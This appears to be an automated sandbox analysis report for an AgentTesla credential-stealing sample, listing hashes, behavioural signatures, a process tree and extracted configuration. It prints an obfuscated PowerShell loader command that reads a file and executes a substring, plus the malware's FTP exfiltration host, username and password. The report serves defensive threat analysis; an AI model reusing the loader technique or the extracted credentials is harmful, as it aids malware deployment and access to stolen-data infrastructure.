Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240730-en -
resource tags
arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system -
submitted
02/08/2024, 02:24
Static task
static1
Behavioral task
behavioral1
Sample
cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6.exe
Resource
win10v2004-20240730-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240730-en
General
-
Target
cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6.exe
-
Size
531KB
-
MD5
7fb6c468f4f153ac076871fd237b285f
-
SHA1
5dbe7fa649ab0848e1e2a908b0b440cea7180e46
-
SHA256
cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6
-
SHA512
2bee31bacd923a2a3a9fcef8ccb36d2cc217a9bd5226db96718a5a7a91e5b5429b74c7432d60999cc19123e0027a4f84a651984fd9b8e2baf179fce4a773ce5f
-
SSDEEP
12288:c18iajdA+qgn+JWE5KljEqOZ8zqZeq0I4WR03ClBO4:nhhA+qgyWE5Ee8zMe1I48llBb
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.elquijotebanquetes.com - Port:
21 - Username:
[email protected] - Password:
4r@d15PS!-!h
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Loads dropped DLL 1 IoCs
pid Process 2772 cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2192 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4400 powershell.exe 2192 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4400 set thread context of 2192 4400 powershell.exe 89 -
pid Process 4400 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 2192 wab.exe 2192 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4400 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4400 powershell.exe Token: SeDebugPrivilege 2192 wab.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2772 wrote to memory of 4400 2772 cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6.exe 85 PID 2772 wrote to memory of 4400 2772 cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6.exe 85 PID 2772 wrote to memory of 4400 2772 cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6.exe 85 PID 4400 wrote to memory of 2192 4400 powershell.exe 89 PID 4400 wrote to memory of 2192 4400 powershell.exe 89 PID 4400 wrote to memory of 2192 4400 powershell.exe 89 PID 4400 wrote to memory of 2192 4400 powershell.exe 89 PID 4400 wrote to memory of 2192 4400 powershell.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6.exe"C:\Users\Admin\AppData\Local\Temp\cd333c6bb19ed893608a3f2bb16e203af243852dcd3b346aef796171bf7a3cb6.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Mopane=Get-Content 'C:\Users\Admin\AppData\Local\Shrinker\Pharmacologically\Outtiring.See';$Derbyernes=$Mopane.SubString(52224,3);.$Derbyernes($Mopane)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
342KB
MD5c9df929008f83572dc1b730d8d57a21f
SHA1dc68516db73477785061617a0540cda76ce5b864
SHA256ad9a885a75b24bad554678af576f5821478bb14db015617357c4be631b449be8
SHA512d484ad8d0f3b64755ab6e3094cea60c7e78b39217193746cfcb6ed0964488059a9afdb19209bf22d6b6d98f3d42fb568f22b1f244179b72f5042c857da3405ce
-
Filesize
51KB
MD5f02ecf447414ca135e082477a9305bab
SHA18ec9e1511ffc16c6138fb96ab204ecb4c3114d32
SHA2564cc09e7dc72d6a35d77786ea0cfc682dbd599c79aff0e0e62338f2ca36532f44
SHA51234bef34f9f5ea4f4df9e9acfa75e018d6c2f20a3f17bcd76846a04083692bc6efba194e2419f79a21e72e8d5a25cfdf3b0a654ff161c433aef5ca0b5dae9daaa
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5143e45d5929ba564ba0c3a0773be76e6
SHA1c7e108ad681dd19afc646a43f7ce757388653f57
SHA2568459feb67b7eb0caaaed607e0f36c8d4979abf1bad87e7f1c7c2b97c73174d6d
SHA5121114403b9af202396ffe32610e1160313ff22c488f87b4a8f771d14fda02a954af7beacad5655143dafdf0af9a76b2a0d5c121ef57819e0567c367578482f003